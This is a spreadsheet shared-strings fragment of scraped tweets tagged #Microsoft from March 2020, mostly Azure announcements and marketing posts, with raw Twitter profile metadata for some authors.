'https://pbs.twimg.com/profile_images/737027818199080961/JUm1bvYQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/736969022856536064/1464563832',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</si>
  <si>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17:16:33 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports. #Microsoft #Cloud #Azure #MSFTadvocate #Storage #Backup #Recovery #Management #Monitoring
https://t.co/PuHPX3eFBy</t>
  </si>
  <si>
    <t>Wed Mar 04 17:15:53 +0000 2020</t>
  </si>
  <si>
    <t>AgreeYa brings you a FREE #MICROSOFT #TEAMS ASSESSMENT PROGRAM, designed to help you uncover the power of effective teamwork. Limited spots available! Submit your nomination here: https://t.co/Fyg7vBP7vQ. #microsoftteams #collaboration https://t.co/7Ff4F73Nvb</t>
  </si>
  <si>
    <t>Wed Mar 04 17:14:50 +0000 2020</t>
  </si>
  <si>
    <t>Some of the biggest #techevents were cancelled in the wake of the #COVID19 and several tech giants had restricted employee #travel due to the threat.
.
.
#coronavirus #StaySafe #techevents #MWC2020 #google #microsoft #adobesummit #Xiaomi #teckgrasp https://t.co/HAdzECFxBh</t>
  </si>
  <si>
    <t>{'id': 1173209338485174272, 'id_str': '1173209338485174272', 'name': 'teckgrasp', 'screen_name': 'teckgrasp', 'location': '', 'description': 'TechNews | Blog | Apps | Gaming | Science | Technology | Gadgets | Facts | Reviews | and more fun on @Teckgrasp', 'url': 'https://t.co/ecaklXboRy', 'entities': {'url': {'urls': [{'url': 'https://t.co/ecaklXboRy', 'expanded_url': 'http://teckgrasp.home.blog', 'display_url': 'teckgrasp.home.blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14, 'friends_count': 130, 'listed_count': 0, 'created_at': 'Sun Sep 15 12:18:07 +0000 2019', 'favourites_count': 204, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 170, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1203660943164469249/wckfHeGb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1203660943164469249/wckfHeGb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1173209338485174272/1568739444',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</si>
  <si>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17:13:35 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/fswfI4ns7o</t>
  </si>
  <si>
    <t>Wed Mar 04 17:13:25 +0000 2020</t>
  </si>
  <si>
    <t>Azure DevTest LabsSecurity alerts for lab environments
- View Azure Security Center alerts for your Azure Resource Management environments deployed through the Azure DevTest Service
https://t.co/OdcIJiOpXL
#Azure #Microsoft #Cloud #DevTestLabs #Security #Alerting #Monitoring https://t.co/alj9U9t0hR</t>
  </si>
  <si>
    <t>Wed Mar 04 17:13:18 +0000 2020</t>
  </si>
  <si>
    <t>PS5 vs XBOX SERIES X - WHO WILL WIN! https://t.co/vW9iqOxKQP via @YouTube #WednesdayThoughts #WednesdayVibes #WednesdayMotivation #WednesdayWisdom #WednesdayMood #TechVision2020 #PlayStation5 #xbox
#Sony #Microsoft #E32020 #BlackPanther #YouTubeGiveUsOurViews https://t.co/2IcACo3ENV</t>
  </si>
  <si>
    <t>Wed Mar 04 17:13:03 +0000 2020</t>
  </si>
  <si>
    <t>@runfaster2000 I am not getting this. #Microsoft started markrting #dotnetcore  3.1 just before sometime, asking devs to migrate from .Net core 3 to 3.1 because 3.1 will be LTS version for next 3 years. And now we have version 5 in preview! Be in pace @dotnet team.</t>
  </si>
  <si>
    <t>{'id': 117139428, 'id_str': '117139428', 'name': 'Abhi Joshi', 'screen_name': 'abhimjoshi', 'location': 'Ahmadabad, India', 'description': 'Observing breathe, Cloud Proficient, Technical Architect, C#, .Net Core, Azure, Redis, Web APIs, Design Patterns, JS, Git, CI and sharing what I have!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 64, 'friends_count': 182, 'listed_count': 8, 'created_at': 'Wed Feb 24 17:19:28 +0000 2010', 'favourites_count': 403, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 635, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '022330', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme13/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1081240352764321792/GBcUWq9w_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1081240352764321792/GBcUWq9w_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/117139428/1426917060', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': '171106', 'profile_text_color': '473623', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:13:01 +0000 2020</t>
  </si>
  <si>
    <t>In Summer 2020, #Microsoft announced Skype for Business Online retirement. 
Read what @patrickwatson77 from @CavellGroup, @tomarbuthnot from @modalitysystems, @ChristopherIsak from @TechAcuteCom, @jonoatwork from @CiscoCollab &amp;amp; @randychapman had to say.
https://t.co/g5yRsombC6</t>
  </si>
  <si>
    <t>{'id': 33653, 'id_str': '33653', 'name': 'Mio', 'screen_name': 'mio', 'location': 'Austin, TX', 'description': 'Keep your teams in sync. Mio powers seamless communication between #Slack, #MicrosoftTeams, &amp; #Webex. Learn more at https://t.co/cfOUg6yY8p', 'url': 'https://t.co/CVADOcdZQp', 'entities': {'url': {'urls': [{'url': 'https://t.co/CVADOcdZQp', 'expanded_url': 'http://dispatch.m.io', 'display_url': 'dispatch.m.io', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/cfOUg6yY8p', 'expanded_url': 'http://m.io', 'display_url': 'm.io', 'indices': [116, 139]}]}}, 'protected': False, 'followers_count': 4538, 'friends_count': 786, 'listed_count': 182, 'created_at': 'Fri Dec 01 08:23:41 +0000 2006', 'favourites_count': 2573, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9908,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1057259678533439489/TctGGBw0_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1057259678533439489/TctGGBw0_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33653/1581061931', 'profile_link_color': '7A38C1',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'regular'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:12:45 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft teases new #Windows 10 Start menu that de-emphasizes Live Tiles.
https://t.co/i3B3Yywnat</t>
  </si>
  <si>
    <t>{'id': 385310686, 'id_str': '385310686', 'name': 'Radovan Rockov', 'screen_name': 'Navodar', 'location': 'Serbia', 'description': 'Software developer, GNU/Linux user, Internet, music &amp; coffee addict', 'url': 'https://t.co/i4PESiWZRk', 'entities': {'url': {'urls': [{'url': 'https://t.co/i4PESiWZRk', 'expanded_url': 'https://sites.google.com/view/radovanr/', 'display_url': 'sites.google.com/view/radovanr/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 176, 'friends_count': 153, 'listed_count': 21, 'created_at': 'Wed Oct 05 08:26:21 +0000 2011', 'favourites_count': 16161, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10423,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'http://pbs.twimg.com/profile_images/726038756357201921/GszD_I1H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/726038756357201921/GszD_I1H_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/385310686/1563044700', 'profile_link_color': '2FC2EF',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</si>
  <si>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Wed Mar 04 17:12:09 +0000 2020</t>
  </si>
  <si>
    <t>A quick stream before work! Let's Play: [Indivisible]  Divisible is In  LIVE NOW at https://t.co/qjmFNEslyy #twitch #twitchtv #indivisible #gamer #rpg #livestream #pc #microsoft #xboxgamepass #nerdstuff</t>
  </si>
  <si>
    <t>{'id': 1067988630541488128, 'id_str': '1067988630541488128', 'name': 'PotterMIA', 'screen_name': 'PotterMIA_TTV', 'location': 'Michigan, USA', 'description': '-Actor -Twitch Streamer -Dream Chaser -Student -Cat Lover / Find me on Instagram: _pottermia_', 'url': 'https://t.co/Bp6mo0AdHl', 'entities': {'url': {'urls': [{'url': 'https://t.co/Bp6mo0AdHl', 'expanded_url': 'https://www.twitch.tv/pottermia', 'display_url': 'twitch.tv/pottermia', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 147, 'friends_count': 236, 'listed_count': 9, 'created_at': 'Thu Nov 29 03:48:26 +0000 2018', 'favourites_count': 45, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 835,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'http://pbs.twimg.com/profile_images/1208660777453969408/JhC1Q-zU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1208660777453969408/JhC1Q-zU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1067988630541488128/1577002100',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</si>
  <si>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17:11:43 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports
#Microsoft #Azure
https://t.co/kg5oCaybi9</t>
  </si>
  <si>
    <t>{'id': 747783996113829888, 'id_str': '747783996113829888', 'name': 'Matias Furones', 'screen_name': 'matiasfurones', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 32, 'friends_count': 28, 'listed_count': 11, 'created_at': 'Tue Jun 28 13:29:32 +0000 2016', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3775, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/750371520531267588/yhViL-2x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/750371520531267588/yhViL-2x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/747783996113829888/1467737851',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</si>
  <si>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17:11:05 +0000 2020</t>
  </si>
  <si>
    <t>Active Directory for #authentication on #SMB access to Azure File in preview
- Mount your Azure Files using Azure AD credentials with the exact same access control experience as on-premises
https://t.co/VIS3DLe5A2
#Azure #Microsoft #Cloud #ActiveDirectory #AzureFiles #Identity https://t.co/Yh9RTCnZdC</t>
  </si>
  <si>
    <t>Wed Mar 04 17:11:03 +0000 2020</t>
  </si>
  <si>
    <t>How many of the 5 habits do you practice?     When it comes to tools for #sales success, #Microsoft #Dynamics365 offers insights and recommendations. Learn more from Cargas Systems. https://t.co/mye3VwwWEn</t>
  </si>
  <si>
    <t>{'id': 1102642349753147393, 'id_str': '1102642349753147393', 'name': "Jaime O'Malley", 'screen_name': 'MalleyJaime', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Mon Mar 04 18:49:57 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 450, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1102642474797940741/CLXvKOEr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1102642474797940741/CLXvKOEr_normal.jpg',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</si>
  <si>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17:10:20 +0000 2020</t>
  </si>
  <si>
    <t>Break down data silos with drag and drop data exploration and interactive reporting with #Microsoft #PowerBI and #Azure. Never miss a post from Simpleworks. Subscribe now! https://t.co/i3nZtG01bt</t>
  </si>
  <si>
    <t>{'id': 23098271, 'id_str': '23098271', 'name': 'miguel zamarripa', 'screen_name': 'BadAzzMaz', 'location': 'Colorado Springs, CO', 'description': 'tech geek, gadget aficionado, beef jerky connoisseur, wanna-be comedian, fisher of trout and a clumsy snowboarder.', 'url': 'https://t.co/XjamkIPnTa', 'entities': {'url': {'urls': [{'url': 'https://t.co/XjamkIPnTa', 'expanded_url': 'http://www.simpleworksit.com', 'display_url': 'simpleworksit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1370, 'friends_count': 4785, 'listed_count': 34, 'created_at': 'Fri Mar 06 18:23:49 +0000 2009', 'favourites_count': 2813, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2182, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '352726', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1109100225979834368/_Hnn4mL0_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1109100225979834368/_Hnn4mL0_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23098271/1571868005', 'profile_link_color': '1B95E0',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</si>
  <si>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Mar 04 17:10:14 +0000 2020</t>
  </si>
  <si>
    <t>Unsure about your ability to meet #GDPR compliance? Thanks to integrations between #Microsoft Cloud App Security and Windows Defender ATP, WheelHouse IT can help. https://t.co/Q3oXGONyHE</t>
  </si>
  <si>
    <t>Wed Mar 04 17:09:49 +0000 2020</t>
  </si>
  <si>
    <t>The Future of Public Sector in India https://t.co/EnbwNZsCp3
For more info: https://t.co/jMv6WIs671 #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto https://t.co/EU2BEnmgWt</t>
  </si>
  <si>
    <t>Wed Mar 04 17:09:45 +0000 2020</t>
  </si>
  <si>
    <t>Secure and seamless business continuity is possible! Nakilat improved efficiency and cut operating costs in half with #Microsoft SaaS solutions. Contact JourneyTEAM to learn how you can too. https://t.co/l1gbPcwjEy</t>
  </si>
  <si>
    <t>{'id': 17685248, 'id_str': '17685248', 'name': 'Ed Roberson, MBA', 'screen_name': 'slcnetwrkr', 'location': 'Sandy, Utah', 'description': 'Transplanted Texan, Business Development Professional, Ex-Rocket Scientist...seriously.', 'url': 'http://t.co/6Fy3K5qrxj', 'entities': {'url': {'urls': [{'url': 'http://t.co/6Fy3K5qrxj', 'expanded_url': 'http://www.edroberson.com', 'display_url': 'edroberson.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 841, 'friends_count': 2488, 'listed_count': 53, 'created_at': 'Thu Nov 27 18:47:02 +0000 2008', 'favourites_count': 1226, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2903,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'http://pbs.twimg.com/profile_images/446397862826373120/O1xO9bwG_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/446397862826373120/O1xO9bwG_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17685248/1456516442',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</si>
  <si>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17:09:36 +0000 2020</t>
  </si>
  <si>
    <t>Were done being in the middle of the herd on this issue  weve decided to use our size and scale to make a difference, said Jeff Bezos, Amazon founder and CEO.
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software</t>
  </si>
  <si>
    <t>Wed Mar 04 17:09:35 +0000 2020</t>
  </si>
  <si>
    <t>Backup Reports is now in preview https://t.co/Trz6WbitO1 #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Updates to Azure HDInsight https://t.co/3MjZoPjvZ1 #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Wed Mar 04 17:09:34 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cosmos DB free tier is now available https://t.co/cfmzKciZy7 #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Active Directory for authentication on SMB access to Azure File in preview https://t.co/0xyGHvlHiE #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>New features in Azure Cosmos DB Jupyter notebooks are now in preview https://t.co/lzqqzns9bK #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Azure FunctionsSupport for custom language workers over HTTP is now in preview https://t.co/UbtONMk7ER #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Virtual machine scale sets now simpler to manage https://t.co/FAiAFTCrWQ #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Wed Mar 04 17:09:33 +0000 2020</t>
  </si>
  <si>
    <t>PowerShell 7.0 is now generally available https://t.co/e8G5WvIfIf #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Data Factory adds Flatten transformation, single-row lookups, and updated UI for container activities https://t.co/d5JCnAAgk4 #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/dFBA2pVHcD #Microsoft #Azure #Cloud https://t.co/aQ91UcPAC4</t>
  </si>
  <si>
    <t>Wed Mar 04 17:09:09 +0000 2020</t>
  </si>
  <si>
    <t>Backup Reports is now in preview: https://t.co/iedgMALvqL #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:09:08 +0000 2020</t>
  </si>
  <si>
    <t>Updates to Azure HDInsight: https://t.co/SjBeqXg0Ze #Azure #Microsoft</t>
  </si>
  <si>
    <t>Azure Cosmos DB free tier is now available: https://t.co/sEOaj7spWF #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:09:07 +0000 2020</t>
  </si>
  <si>
    <t>Active Directory for authentication on SMB access to Azure File in preview: https://t.co/f1RgOW0Bzz #Azure #Microsoft</t>
  </si>
  <si>
    <t>New features in Azure Cosmos DB Jupyter notebooks are now in preview: https://t.co/PI436hoiKH #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:09:06 +0000 2020</t>
  </si>
  <si>
    <t>Azure FunctionsSupport for custom language workers over HTTP is now in preview: https://t.co/MvTA3KPEDv #Azure #Microsoft</t>
  </si>
  <si>
    <t>Virtual machine scale sets now simpler to manage: https://t.co/bPR5IhUSPZ #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:09:05 +0000 2020</t>
  </si>
  <si>
    <t>PowerShell 7.0 is now generally available: https://t.co/Wu8fLm5Us3 #Azure #Microsoft</t>
  </si>
  <si>
    <t>Data Factory adds Flatten transformation, single-row lookups, and updated UI for container activities: https://t.co/uoRtxilCQJ #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:08:35 +0000 2020</t>
  </si>
  <si>
    <t>Let us help you implement Azure into your current infrastructure. Datalink Networks can assist with all aspects of your Azure deployment!
Learn more: https://t.co/HYxXwZVyAy
#azure #azureactivedirectory #microsoft #microsoftazure #datalinknetworks https://t.co/GqYWrZbJYU</t>
  </si>
  <si>
    <t>Wed Mar 04 17:08:14 +0000 2020</t>
  </si>
  <si>
    <t>Announcing preview of Backup Reports https://t.co/sefOsPXU7B #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Mar 04 17:07:43 +0000 2020</t>
  </si>
  <si>
    <t>To receive updates from Abrahams Consulting on our infrastructure modernization solutions and #Microsoft #Azure services, subscribe now! https://t.co/i8XbuVSkZf</t>
  </si>
  <si>
    <t>{'id': 177930766, 'id_str': '177930766', 'name': 'Angela Gibson', 'screen_name': 'AbrahamsConsult', 'location': 'New York', 'description': 'Networking, Storage, Security &amp; Career Opportunities? We find you the right solution.', 'url': 'http://t.co/ZvypjK6QUY', 'entities': {'url': {'urls': [{'url': 'http://t.co/ZvypjK6QUY', 'expanded_url': 'http://www.abrahamsconsulting.com', 'display_url': 'abrahamsconsulting.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2861, 'friends_count': 3315, 'listed_count': 87, 'created_at': 'Fri Aug 13 12:39:26 +0000 2010', 'favourites_count': 231, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15151, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '1DD3EB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1206923454/Angela-184t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1206923454/Angela-184t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/177930766/1400493204', 'profile_link_color': '449EE3', 'profile_sidebar_border_color': '64E858', 'profile_sidebar_fill_color': '3DEB60', 'profile_text_color': '1A0606', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 17:07:37 +0000 2020</t>
  </si>
  <si>
    <t>Tired of Twitch? Heres how to stream on #Microsofts #Mixer https://t.co/3wytrUK4Ix https://t.co/j1cgfBnbHW</t>
  </si>
  <si>
    <t>Wed Mar 04 17:06:28 +0000 2020</t>
  </si>
  <si>
    <t>Another great release by the @AzureBackup team! Announcing preview of Backup Reports
- Boundary-less reporting
- Rich slicing, dicing, and drill-down capabilities
- Native Azure-based experience
https://t.co/WdyiJ7LuQw
#Azure #Microsoft #Cloud #Backup #BCDR #DisasterRecovery https://t.co/aRYiUArNj9</t>
  </si>
  <si>
    <t>Wed Mar 04 17:06:10 +0000 2020</t>
  </si>
  <si>
    <t>"We're happy to announce #KiwiTCMS version 8.1!" https://t.co/gLvIZRnO85 scroll down to see the trouble #microsoft #github gives them. #deletegithub</t>
  </si>
  <si>
    <t>Wed Mar 04 17:06:02 +0000 2020</t>
  </si>
  <si>
    <t>Power Automate UI Flows February 2020 update is now available https://t.co/3N4aE73cOd #Microsoft #PowerAutomate #Flow</t>
  </si>
  <si>
    <t>Wed Mar 04 17:05:27 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft #RPA     VIA @mspowerautomate    Robotic process automation now in preview in Microsoft Power Automate  https://t.co/sBScuA28fi</t>
  </si>
  <si>
    <t>Wed Mar 04 17:05:22 +0000 2020</t>
  </si>
  <si>
    <t>#Google, #Amazon and #Microsoft give input to new #healthAI standard  https://t.co/hHZOvKH55u  #healthTECH</t>
  </si>
  <si>
    <t>{'id': 237441463, 'id_str': '237441463', 'name': 'Kathleen Poulos', 'screen_name': 'katseyemedia', 'location': 'Orange County, CA', 'description': 'Entrepreneur, lover of the techy, digital &amp; #socialmedia world. Nurse, melanoma patient, patient advocate, animal rescuer. #patientengagement #raredisease', 'url': 'http://t.co/NgGuknltC9', 'entities': {'url': {'urls': [{'url': 'http://t.co/NgGuknltC9', 'expanded_url': 'http://kathleenpoulos.com', 'display_url': 'kathleenpoulos.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3639, 'friends_count': 2435, 'listed_count': 419, 'created_at': 'Wed Jan 12 21:16:24 +0000 2011', 'favourites_count': 7848, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 14708,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'http://pbs.twimg.com/profile_images/417466842253234176/9i1nZATj_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/417466842253234176/9i1nZATj_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/237441463/1422857004', 'profile_link_color': 'E06A1B',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</si>
  <si>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Wed Mar 04 17:05:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft introduced its #Teams platform in 2016, but you may not have heard of it. And thats a shame, because it could help you reduce your reliance on email and become a far more productive architectural practice. 
https://t.co/KiKS32d3KT</t>
  </si>
  <si>
    <t>Wed Mar 04 17:05:10 +0000 2020</t>
  </si>
  <si>
    <t>On this weeks podcast recorded at #Microsoft Ignite in London we discuss modernisation of applications, datacenters and ways to work and what #Microsoft are doing to help @jabenedicic and @mcbride_ruairi join me to share their experiences - enjoy  https://t.co/ggz1FDLtnw</t>
  </si>
  <si>
    <t>Wed Mar 04 17:04:16 +0000 2020</t>
  </si>
  <si>
    <t>What's new in #office365 from Feb 2020 #microsoft https://t.co/fXTwgFDFZo https://t.co/qvl51uDHLw</t>
  </si>
  <si>
    <t>Wed Mar 04 17:03:35 +0000 2020</t>
  </si>
  <si>
    <t>Should we rethink the #ageold #technique of #processmapping ? Like #bpmn done on #visio. Shouldn't #processmapping be all about making things simple for the average Joe to follow...#foodforthought 
#promapp #nintex #lucidart #microsoft #visio #aris 
https://t.co/1kss1LIQok</t>
  </si>
  <si>
    <t>{'id': 221373770, 'id_str': '221373770', 'name': 'Uday Nair', 'screen_name': 'UdayRNair', 'location': 'United Kingdom', 'description': '#ProcessImprovement Manager #BOC #Engineering #UK &amp; #ROI part of @LindePlc. Part time #Technologist, #Reader &amp; #Traveller.\nRTs donot imply endorsments.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 94, 'friends_count': 142, 'listed_count': 18, 'created_at': 'Tue Nov 30 13:58:55 +0000 2010', 'favourites_count': 211, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5534,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'http://pbs.twimg.com/profile_images/1148924661100621827/q9-qnZDT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148924661100621827/q9-qnZDT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/221373770/1572368160',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</si>
  <si>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17:03:27 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/I3sU42dead</t>
  </si>
  <si>
    <t>Wed Mar 04 17:02:55 +0000 2020</t>
  </si>
  <si>
    <t>#LiveTiles will be with @TimlinEnt and @NucleusCyber at #MTCBoston on March 12, co-hosting a seminar on how to secure #collaboration in #MicrosoftTeams. Register now: https://t.co/wV7IvYXM7V
#BostonProfessionals #BostonTechnology #MTC #Microsoft #SharePoint #MSTeams #MSPartner https://t.co/IwkI69VGKJ</t>
  </si>
  <si>
    <t>{'id': 2641840458, 'id_str': '2641840458', 'name': 'LiveTiles', 'screen_name': 'livetiles', 'location': 'New York, NY', 'description': 'LiveTiles is a global software company that provides solutions and tools to build intelligent workplaces through AI, analytics and UI design.', 'url': 'http://t.co/wVz24Nr5OL', 'entities': {'url': {'urls': [{'url': 'http://t.co/wVz24Nr5OL', 'expanded_url': 'http://www.livetiles.nyc', 'display_url': 'livetiles.nyc', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2795, 'friends_count': 1763, 'listed_count': 866, 'created_at': 'Mon Jul 14 01:52:58 +0000 2014', 'favourites_count': 2279, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9968,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'http://pbs.twimg.com/profile_images/733574045858308096/F6b1RX4h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/733574045858308096/F6b1RX4h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2641840458/1543862935', 'profile_link_color': '707070',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</si>
  <si>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17:01:37 +0000 2020</t>
  </si>
  <si>
    <t>Let's get a good porn, a crate of beer, and call my girlfriend? #Texas   #microsoft #mvsales https://t.co/z0CZPtO9mr</t>
  </si>
  <si>
    <t>{'id': 1235237804491395074, 'id_str': '1235237804491395074', 'name': 'Gloria Chavez', 'screen_name': 'tiacygolfsoft', 'location': 'Salt Lake City, USA', 'description': 'This small town hasnâ€™t got room', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Wed Mar 04 16:17:02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'http://pbs.twimg.com/profile_images/1235247068433788929/MdFVCEdJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235247068433788929/MdFVCEdJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235237804491395074/1583340855',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</si>
  <si>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17:01:04 +0000 2020</t>
  </si>
  <si>
    <t>Calsoft's Windows CBT solution ensures fast and efficient protection for virtual machines. Download the CBT brochure to know more about the business impacts of using CBT: https://t.co/lBJL7eGm8M
#changeblocktracking #CSCBT #WindowsCBT #changefiletracking #microsoft https://t.co/aqILeGo2hI</t>
  </si>
  <si>
